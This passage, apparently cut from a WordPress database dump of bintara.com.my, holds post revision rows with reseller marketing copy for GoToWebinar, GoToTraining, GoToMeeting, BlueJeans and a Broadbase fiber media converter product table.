lot of fun along the way.\r\n\r\n<img class=\" wp-image-1977 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png\" alt=\"\" width=\"434\" height=\"298\" />\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Engagement Dashboard -- Keep an eye on attentiveness, hands raised and time elapsed.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Presenter Webcams -- Show off your bright smile and invite panelists to do the same.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Polls &amp; Surveys -- Engage your audience with slide-in questions and live results.</li>\r\n</ul>\r\n<iframe src=\"https://www.youtube.com/embed/uDdg_Z2KzHs\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>','GoToWebinar','','inherit','closed','closed','','1633-revision-v1','','','2018-12-12 22:24:27','2018-12-12 14:24:27','',1633,'https://bintara.com.my/blog/2018/12/12/1633-revision-v1/',0,'revision','',0),(3573,1,'2019-09-30 15:31:02','2019-09-30 07:31:02','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<div></div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div></div>\r\n<div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div></div>\r\n</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div></div>\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:31:02','2019-09-30 07:31:02','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(2010,1,'2018-12-12 22:27:21','2018-12-12 14:27:21','','gototraining 1','','inherit','closed','closed','','gototraining-1','','','2018-12-12 22:27:21','2018-12-12 14:27:21','',1634,'https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg',0,'attachment','image/jpeg',0),(2011,1,'2018-12-12 22:27:22','2018-12-12 14:27:22','','gototraining 2','','inherit','closed','closed','','gototraining-2-2','','','2018-12-12 22:27:22','2018-12-12 14:27:22','',1634,'https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg',0,'attachment','image/jpeg',0),(3579,1,'2019-09-30 16:03:59','2019-09-30 08:03:59','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">\r\n  Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.\r\n</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n  <li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n\r\n<ul>\r\n  <li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n\r\n<ul>\r\n  <li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 16:03:59','2019-09-30 08:03:59','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3580,1,'2019-09-30 16:04:58','2019-09-30 08:04:58','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">\r\n  Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.\r\n</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n  <li class=\"icon-text__title arrow\"><h4>Custom Registration</h4></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n\r\n<ul>\r\n  <li class=\"icon-text__title arrow\"><h4>RevStream Payment Processing</h4></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n\r\n<ul>\r\n  <li class=\"icon-text__title arrow\"><h4>Content Sharing</h4></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 16:04:58','2019-09-30 08:04:58','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3574,1,'2019-09-30 15:37:21','2019-09-30 07:37:21','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n\r\n\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div>\r\n  <iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n</div>\r\n&nbsp;','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:37:21','2019-09-30 07:37:21','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(2042,1,'2018-12-13 19:21:52','2018-12-13 11:21:52','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<div></div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div></div>\r\n<div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div></div>\r\n</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div></div>\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2018-12-13 19:21:52','2018-12-13 11:21:52','',1634,'https://bintara.com.my/blog/2018/12/13/1634-revision-v1/',0,'revision','',0),(2012,1,'2018-12-12 22:38:54','2018-12-12 14:38:54','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<div></div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div></div>\r\n<div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div></div>\r\n</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Recording</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Record your training and upload to the cloud for viewing on any device.</div>\r\n<div></div>\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2018-12-12 22:38:54','2018-12-12 14:38:54','',1634,'https://bintara.com.my/blog/2018/12/12/1634-revision-v1/',0,'revision','',0),(2019,1,'2018-12-12 22:56:14','2018-12-12 14:56:14','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\r\n<h3 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h3>\r\n<ul>\r\n 	<li>Collaborate with business managing</li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\r\n<ul>\r\n 	<li>Less Note-Taking with Transcripts</li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\r\n<ul>\r\n 	<li>Meet instantly or schedule one for later</li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\r\n<ul>\r\n 	<li>Customize team setting to your needs</li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\r\n<ul>\r\n 	<li>Out of the box video conferencing</li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','GoToMeeting','','inherit','closed','closed','','1632-revision-v1','','','2018-12-12 22:56:14','2018-12-12 14:56:14','',1632,'https://bintara.com.my/blog/2018/12/12/1632-revision-v1/',0,'revision','',0),(2020,1,'2018-12-12 23:03:47','2018-12-12 15:03:47','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\r\n<h3 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h3>\r\n<ul>\r\n 	<li>Collaborate with business managing</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\r\n<ul>\r\n 	<li>Less note-taking with Transcripts</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\r\n<ul>\r\n 	<li>Meet instantly or schedule one for later</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\r\n<ul>\r\n 	<li>Customize team setting to your needs</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\r\n<ul>\r\n 	<li>Out of the box video conferencing</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','GoToMeeting','','inherit','closed','closed','','1632-revision-v1','','','2018-12-12 23:03:47','2018-12-12 15:03:47','',1632,'https://bintara.com.my/blog/2018/12/12/1632-revision-v1/',0,'revision','',0),(2022,1,'2018-12-13 08:19:22','2018-12-13 00:19:22','.project-4-column .project-item { width: 16.6% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-13 08:19:22','2018-12-13 00:19:22','',1980,'https://bintara.com.my/blog/2018/12/13/1980-revision-v1/',0,'revision','',0),(2023,1,'2018-12-13 18:39:45','2018-12-13 10:39:45','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"736\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-13 18:39:45','2018-12-13 10:39:45','',1943,'https://bintara.com.my/blog/2018/12/13/1943-revision-v1/',0,'revision','',0),(2024,1,'2018-12-13 19:11:46','2018-12-13 11:11:46','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h3 class=\"Section-title h2\">Modernize your meetings for today\'s work</h3>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"wp-image-2029 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"637\" height=\"260\" />\r\n\r\n</header>\r\n<h2 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h2>\r\nCloud-based meeting and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li><strong>Simple</strong></li>\r\n</ul>\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-body\"><strong>Modern</strong></li>\r\n</ul>\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-body\"><strong>Trusted</strong></li>\r\n</ul>\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n<div 